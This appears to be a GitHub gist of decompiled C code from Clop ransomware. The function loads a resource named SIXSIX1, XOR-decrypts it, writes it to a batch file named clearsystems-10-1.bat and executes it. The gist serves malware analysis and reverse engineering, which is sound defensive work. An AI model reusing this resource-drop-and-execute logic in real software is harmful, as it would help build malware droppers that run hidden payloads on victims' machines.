Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
decompiled / reverse-engineered Clop deobfuscation of SIXSIX1 resource code
HINSTANCE LoadExecuteClearSystemsBatchFile()
{
HMODULE hModule; // eax
HMODULE phModule; // ebx
HRSRC hRsrcSIXSIX1; // eax
HRSRC phRsrcSIXSIX1; // esi
HGLOBAL hGlobalRsrcSIXSIX1; // eax
const void *ResourceLock; // edi
DWORD cbResourceSIXSIX1; // esi
HGLOBAL hDecryptedResourceMemory; // ebx
DWORD pcbResourceSIXSIX1; // edi
DWORD i; // esi
HANDLE hDecryptedFile; // esi
DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-214h]
DWORD nNumberOfBytesToWrite; // [esp+10h] [ebp-210h]
CHAR currentPath; // [esp+14h] [ebp-20Ch]
CHAR FileName; // [esp+118h] [ebp-108h]
hModule = GetModuleHandleW(0);
phModule = hModule;
hRsrcSIXSIX1 = FindResourceW(hModule, (LPCWSTR)0xF447, L"SIXSIX1");
phRsrcSIXSIX1 = hRsrcSIXSIX1;
hGlobalRsrcSIXSIX1 = LoadResource(phModule, hRsrcSIXSIX1);
ResourceLock = LockResource(hGlobalRsrcSIXSIX1);
cbResourceSIXSIX1 = SizeofResource(phModule, phRsrcSIXSIX1);
nNumberOfBytesToWrite = cbResourceSIXSIX1;
hDecryptedResourceMemory = GlobalAlloc(GMEM_ZEROINIT, cbResourceSIXSIX1);
memmove(hDecryptedResourceMemory, ResourceLock, cbResourceSIXSIX1);
pcbResourceSIXSIX1 = cbResourceSIXSIX1;
for ( i = 0; i < pcbResourceSIXSIX1; ++i )
*((_BYTE *)hDecryptedResourceMemory + i) ^= charArrMagicStr[i % 0x42];
GetCurrentDirectoryA(260u, &currentPath);
wsprintfA(&FileName, "%s\\clearsystems-10-1.bat", &currentPath);
NumberOfBytesWritten = 0;
hDecryptedFile = CreateFileA(&FileName, 0x40000000u, 2u, 0, 4u, 0x80u, 0);
if ( hDecryptedFile != (HANDLE)-1 )
{
WriteFile(hDecryptedFile, hDecryptedResourceMemory, pcbResourceSIXSIX1, &NumberOfBytesWritten, 0);
CloseHandle(hDecryptedFile);
}
GlobalFree(hDecryptedResourceMemory);
return ShellExecuteA(0, "open", &FileName, 0, 0, 0);
}
@danzek

This comment has been minimized.

Copy link
Owner Author

commented Apr 3, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.